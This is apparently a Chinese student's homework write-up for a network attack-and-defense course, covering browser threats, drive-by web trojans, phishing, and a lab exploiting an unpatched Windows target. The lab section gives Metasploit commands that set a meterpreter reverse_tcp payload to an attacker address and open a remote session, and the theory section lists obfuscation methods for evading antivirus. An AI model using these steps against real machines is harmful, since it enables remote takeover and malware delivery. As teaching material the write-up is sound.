20199305 2019-2020-2 《网络攻防实践》第十二周作业
一、前言
问题 |
回答 |
作业属于 |
https://edu.cnblogs.com/campus/besti/19attackdefense |
作业要求 |
https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10553 |
课程目标 |
学习教材第十二章,完成课后实践 |
二、知识梳理
1.Web浏览器的技术发展与安全威胁
1.1Web浏览器战争与技术发展
1.1.1浏览器战争
浏览器大战,指不同的网络浏览器之间的市场份额竞争。常用来指以下两组竞争:第一组是20世纪时微软公司的Internet Explorer取代了网景公司,Netscape Navigator主导地位,这场大战甚至引发了美国诉微软案官司。第二组为2003年后Internet Explorer份额遭其他浏览器蚕食,包括Mozilla Firefox,Google Chrome,Safari和Opera
1.1.2浏览器技术发展
古典命令行浏览器仅仅实现了简单的HTTP客户端、HTML解析与渲染功能,而在浏览器的商业竞争中,出现了高度注重用户使用感受的图形界面浏览器软件,并逐步提供了图片、音视频等多媒体的支持,逐步进化目前互联网用户所依赖的现代浏览器
1.1.3现代Web浏览器的基本结构与机理
目前的现代Web浏览器要求能够理解和支持HTML和XHTML、CascadingStyleSheets (CSS)、ECMAScript及W3C Document Object Model (DOM)等一系列标准需要支持各种应用层协议的Stream流接收与解析,并维护DOM对象模型结构,通过支持EMCAScript标准构建JavaScript. FlashActionScript等客户端脚本语言的执行环境,以及支持CSS标准控制页面的布局,最终在浏览器终端中将服务器端的各种流媒体对象、应用程序、客户端脚本执行效果进行渲染,展现给终端用户
1.2Web浏览器的安全问题与威胁
1.2.1Web浏览器软件的安全困境三要素
(1)复杂性:现代Web浏览器软件由于需要支持HTTP、HTTPS、 FTP等多种类型的应用层协议浏览,符合HTML、XHTML、CSS等一系列的页面标准规范,支持JavaScript、Flash、Java、 SilverLight 等多种客户端执行环境,并满足大量的用户浏览需求,已经变得非常复杂和庞大,这意味着更多的错误和安全缺陷,也就导致了目前浏览器软件中存在着可被渗透攻击所利用的大量安全漏洞。
(2)可扩展性:现代Web浏览器可能是最突出可扩展特性支持的软件类型,目前儿乎所有的现代浏览器软件都支持第三方插件扩展机制,并通过JavaScript等客户端脚本执行环境、沙箱和虚拟机来执行富Internet应用程序。而相对于大型软件厂商所开发的浏览器软件本身而言,三方扩展插件的开发过程更缺乏安全保证,出现安全漏洞的情况更为普遍。此外,浏览器插件一般也不具备自动版本更新的机制,安全漏洞被利用的时间周期较系统软件与浏览器软件本身漏洞要长。
(3)连通性:现代Web浏览器本身就是为用户实现“随时随地浏览互联网”这一目标而存在的,因此浏览器软件始终工作在联网状态,一旦其中存在安全漏洞,就很容易被网络上的威胁源所利用与攻击。
1.2.2Web浏览器安全威胁位置
如同Web应用服务端一样,Web浏览魂晶中的每个组件都面对着各种不同类型的安全威胁:
-
针对传输网络的网络协议安全威胁
-
针对Web了浏览器系统的平台安全威胁
-
针对Web浏览器软件及插件程序的渗透攻击威胁
-
针对互联网用户的社会工程学攻击威胁
2.Web浏览端的渗透攻击威胁——网页木马
2.1网页木马安全威胁的产生背景
2.1.1网页木马的产生与发展背景
网页木马是从而以网页脚本所孕育和发展出来的,如早期的的浏览器主页劫持、网页炸弹等。而黑客们进一步发掘出在浏览器端执行的恶意网页脚本能够利用客户端软件安全漏洞来获取访问权的机会,在浏览断之如恶意程序或进行其他任意操作,从而发展出网页木马这种较新的网络攻击技术
2.1.2web浏览安全威胁类型
(1)网络钓鱼(Phishing):架设钓鱼网站,如知名金融机构及商务网站,发送大量欺骗性垃圾邮件,诱骗因特网用户访问钓鱼网站并以敏感信息登录,最后滥用个人敏感信息
(2)恶意木马与流氓软件下载:主要包括两大问题:软件捆绑安装问题 ,Web浏览时遭遇的软件信任问题
(3)网页木马-浏览器渗透攻击:网页感染已成为国内互联网最重要的恶意代码传播形式
(4)不良信息内容
2.2网页木马的机理分析
2.2.1网页木马的定性特性
网页木马从本质特性上是利用了现代Web浏览器软件中所支持的客户端脚本执行能力,针对Web浏览端软件安全漏洞实施客户端渗透攻击,从而取得在客户端主机的远程代码执行权限来植入恶意程序。从根本上来说,网页木马是针对Web浏览端软件实施的客户端渗透攻击代码。
2.2.2对网页木马机理的全方位分析与理解
与传统的服务器端渗透攻击可以主动的进行网络扫描与攻击不同,网页木马的攻击是被动式的,需要通过一些技术方法来诱使互联网用户来访问网页木马页面。此外在网页木马通过渗透攻击获得远程客户端执行权限后,为了进行进一步的主机控制和敏感信息窃取,一般需要植入一些盗号木马等类型的恶意程序。黑客为了更为高效地实施网页木马这种复杂的攻击场景,建立了一套具有明确的社会职责分工的网页木马攻击技术流程:
(1)病毒编写者负责实现网页木马和传统的盗号木马
(2)网络骇客出卖网站访问者或攻陷不安全的网站
(3)“信封”盗窃者在木马宿主站点上放置网页木马和传统盗号木马,并通过在大量网站中嵌入恶意链接将访问者重定向至网页木马,从而构建网页木马攻击网络
(4)受害者在访问挂马网站时,就会自动地链接网页木马并被其功绩,植入传统盗号木马,进而被盗取“信封”和虚拟资产
2.2.3网页挂马机制
(1)为使得能够有终端用户使用可能存在安全漏洞的Web浏览端软件来访问网页木马,攻击者还需要将网页木马挂接到一些拥有客户访问流量的网站页面上
(2)网页挂马四策略:
-
内嵌HTML标签:使用内嵌HTML标签,将网页木马链接嵌入到网站首页或其他页面中
-
恶意Script脚本:利用script脚本标签通过外部引用脚本的方式来包含网页木马
-
内嵌对象链接:利用图片、Flash等内嵌对象中的特定方法来完成指定页面的加载
-
ARP欺骗挂马:在以上三类网站挂马策略基础上,危害更高的策略
2.2.4混淆机制
(1)提高反病毒工程师的分析难度,从而使得网页木马攻击网络更加难以被检测和摧毁
(2)比较广泛使用的混淆方法:
-
将代码重新排版,去除缩进、空行、换行、注释等,同时将网页木马中的变量名替换为一组合法的随机字符串,使其失去自我描述的能力,从而干扰阅读分析
-
通过大小写变换、十六进制编码、escape编码、unicode编码等方法对网页木马进行编码混淆
-
通过通用或定制的加密工具对网页木马进行加密得到密文,然后使用脚本语言中包含的解密函数,对密文进行解密,再使用 document.write() 或 eval() 进行动态输出或执行,此类混淆方法例如XXTEA网页加密工具
-
利用字符串运算、数学运算或特殊函数可以混淆代码,一个典型的例子是通过字符串替换函数将网页木马中的一些字符替换为其他字符构成混淆后代码,然后在运行时首先替换回原先的字符,然后进行动态执行
-
修改网页木马文件掩码欺骗反病毒软件,或对网页木马文件结构进行混淆,来伪装正常文件,甚至将网页木马代码拆分至多个文件等
2.4网页木马防范措施
-
提升操作系统与浏览器软件的安全性,如第三方插件自动更新
-
安装反病毒软件
-
养成良好的浏览习惯,借助安全评估工具的帮助,避免访问安全性低的网站
3.揭开网络钓鱼的黑幕
3.1网络钓鱼技术概述
3.1.1什么是网络钓鱼攻击
(1)网络钓鱼 (Phishing)攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。诈骗者通常会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌,骗取用户的私人信息
3.1.2中国的网络钓鱼攻击
(1)中国互联网络信息中心联合国家互联网应急中心发布的《2009年中国网民网络信息安全状况调查报告》显示,2009年有超过九成网民遇到过网络钓鱼,在遭遇过网络钓鱼事件的网民中,4500万网民蒙受了经济损失,占网民总数11.9%。网络钓鱼给网民造成的损失已达76亿元
3.2网络钓鱼攻击的技术内幕
3.2.1网络钓鱼攻击的普遍技术流程
(1)攻击者扫描网段,寻找有漏洞的服务器;
(2)服务器被攻陷,并安装一个 Rootkit 或口令保护的后门工具;
(3)攻击者从加密的后门工具获得对服务器的访问权,并下载已经构建完毕的钓鱼网站内容,进行一些网站搭建配置测试工作,使得钓鱼网站上线运行;
(4)攻击者下载群发电子邮件工具,并大规模散发包含假冒钓鱼网站信息的欺骗性垃圾邮件;
(5)网页浏览的流量开始到达里钓鱼网站,潜在的受害者开始访问假冒的钓鱼网站内容,并受欺骗给出个人敏感信息,攻击者通过服务器后台脚本收集这些个人敏感信息。
3.3网络钓鱼攻击的防范
对以索取个人敏感信息的邮件提高警惕性,充分利用浏览器安全访问提示,涉及网上金融操作时,务必重要网站真实性,尽量使用U盾代替证书或口令。
三、动手实践
1、Web浏览器渗透攻击实验
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
所需环境:
②靶机:未打补丁的Windows靶机,可使用Windows 2KS靶机或Windows XP靶机
实验步骤:
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
(2)输入set LHOST 192.168.200.3
设置攻击机地址;输入set payload windows/meterpreter/reverse_tcp
设置载荷;输入exploit
进行攻击
(3)攻击后得到有木马的网址为http://192.168.200.3:8080/i7Nmw8nOVZOe1
,在靶机中访问地址,回到攻击机中显示建立会话
(4)最后我们验证会话是否有效,用sessions
查看连接。使用指令sessions -i 2
打开会话2,此时攻击机即可在靶机上执行命令,用ifconfig
命令可以查看靶机地址
2、Web 浏览器渗透攻击攻防对抗
(1)构建漏洞的过程如第一个实践所示
(2)将链接地址复制粘贴到kali虚拟机中的搜狐浏览器中,搜索网址并右键网页查看源码,可以看到关键指令做了字符串拼接处理和大量的空白间隔。
(3)用在线工具https://www.sojson.com/jsjiemi.html
, 去掉js代码中的空格
去除空白与间隔后(),代码如下
< html > < head > < title > < /title>EPboqnoNqNOztTdS